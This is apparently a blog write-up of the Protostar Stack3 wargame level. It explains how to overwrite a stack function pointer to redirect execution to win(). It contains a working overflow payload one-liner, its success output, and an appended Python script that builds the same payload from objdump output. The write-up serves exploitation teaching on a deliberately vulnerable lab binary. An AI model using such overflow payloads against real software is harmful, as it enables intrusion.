Saturday, December 13, 2014

Protostar - Stack #3


Stack3 looks at environment variables, how they can be set, and at overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP).

Source Code:


Stack3 is similar to the previous three levels, but we're starting to move towards the classic buffer overflow case of overwriting the saved EIP.

Here we need to overwrite the function pointer fp in such a way that it causes win() to get executed when fp is eventually called at line 20.

First, we need to find where in memory win() is located...

Running objdump -t stack3 prints:

080484f0 l     F .text    00000000              __do_global_ctors_aux
00000000 l    df *ABS*    00000000              stack3.c
0804967c l     O .got.plt    00000000              .hidden _GLOBAL_OFFSET_TABLE_
08049594 l       .ctors    00000000              .hidden __init_array_end
08049594 l       .ctors    00000000              .hidden __init_array_start
080495a8 l     O .dynamic    00000000              .hidden _DYNAMIC
0804969c  w      .data    00000000              data_start
08048480 g     F .text    00000005              __libc_csu_fini
08048370 g     F .text    00000000              _start
00000000  w      *UND*    00000000              __gmon_start__
00000000  w      *UND*    00000000              _Jv_RegisterClasses
08048538 g     O .rodata    00000004              _fp_hw
0804851c g     F .fini    00000000              _fini
00000000       F *UND*    00000000              gets@@GLIBC_2.0
00000000       F *UND*    00000000              __libc_start_main@@GLIBC_2.0
08048424 g     F .text    00000014              win
0804853c g     O .rodata    00000004              _IO_stdin_used
0804969c g       .data    00000000              __data_start
080496a0 g     O .data    00000000              .hidden __dso_handle
080495a0 g     O .dtors    00000000              .hidden __DTOR_END__
08048490 g     F .text    0000005a              __libc_csu_init
00000000       F *UND*    00000000              printf@@GLIBC_2.0
080496a4 g       *ABS*    00000000              __bss_start
080496ac g       *ABS*    00000000              _end
00000000       F *UND*    00000000              puts@@GLIBC_2.0
080496a4 g       *ABS*    00000000              _edata
080484ea g     F .text    00000000              .hidden __i686.get_pc_thunk.bx
08048438 g     F .text    00000041              main
080482e0 g     F .init    00000000              _init


The one we care about is win, which the symbol table places at address 0x08048424.

Now that we know the address, the rest of the solution is similar to the previous levels.

Running $ python -c "print 'x'*64 + '\x24\x84\x04\x08'" | ./stack3 (64 bytes of filler to reach fp, then the address of win in little-endian byte order, which is why its bytes appear reversed) prints the following:

calling function pointer, jumping to 0x08048424
code flow successfully changed
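As an added example (not part of the original post), the same payload built with Python 3 instead of a hand-typed byte string: a small parser pulls the address of win out of the objdump -t symbol table quoted above, and struct.pack handles the little-endian encoding. The OBJDUMP_OUTPUT sample is a constructed excerpt of that listing.

```python
import re
import struct
import sys

# Constructed excerpt of the `objdump -t stack3` listing shown above.
OBJDUMP_OUTPUT = """\
080484f0 l     F .text    00000000              __do_global_ctors_aux
08048424 g     F .text    00000014              win
08048438 g     F .text    00000041              main
080496a0 g     O .data    00000000              .hidden __dso_handle
00000000       F *UND*    00000000              gets@@GLIBC_2.0
"""

# objdump -t lines: <address> <flags> <section> <size> <name>.  The flag
# column is variable width, so anchor on the hex address at the start and
# the 8-hex-digit size plus name at the end (".hidden" prefix is optional).
SYMBOL_RE = re.compile(
    r"^([0-9a-fA-F]{8})\s+.*?\s+([0-9a-fA-F]{8})\s+(?:\.hidden\s+)?(\S+)$"
)


def parse_symbols(text):
    """Return {name: address} for every symbol line in objdump -t output."""
    symbols = {}
    for line in text.splitlines():
        m = SYMBOL_RE.match(line.rstrip())
        if m:
            symbols[m.group(3)] = int(m.group(1), 16)
    return symbols


def build_payload(target, padding=64):
    # 64 filler bytes reach fp on the stack; the next four bytes overwrite
    # it.  "<I" packs a 32-bit little-endian unsigned int, so 0x08048424
    # becomes the byte sequence 24 84 04 08.
    return b"x" * padding + struct.pack("<I", target)


if __name__ == "__main__":
    win_addr = parse_symbols(OBJDUMP_OUTPUT)["win"]
    # Raw bytes, not text: pipe this into ./stack3 like the one-liner above.
    sys.stdout.buffer.write(build_payload(win_addr))
```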
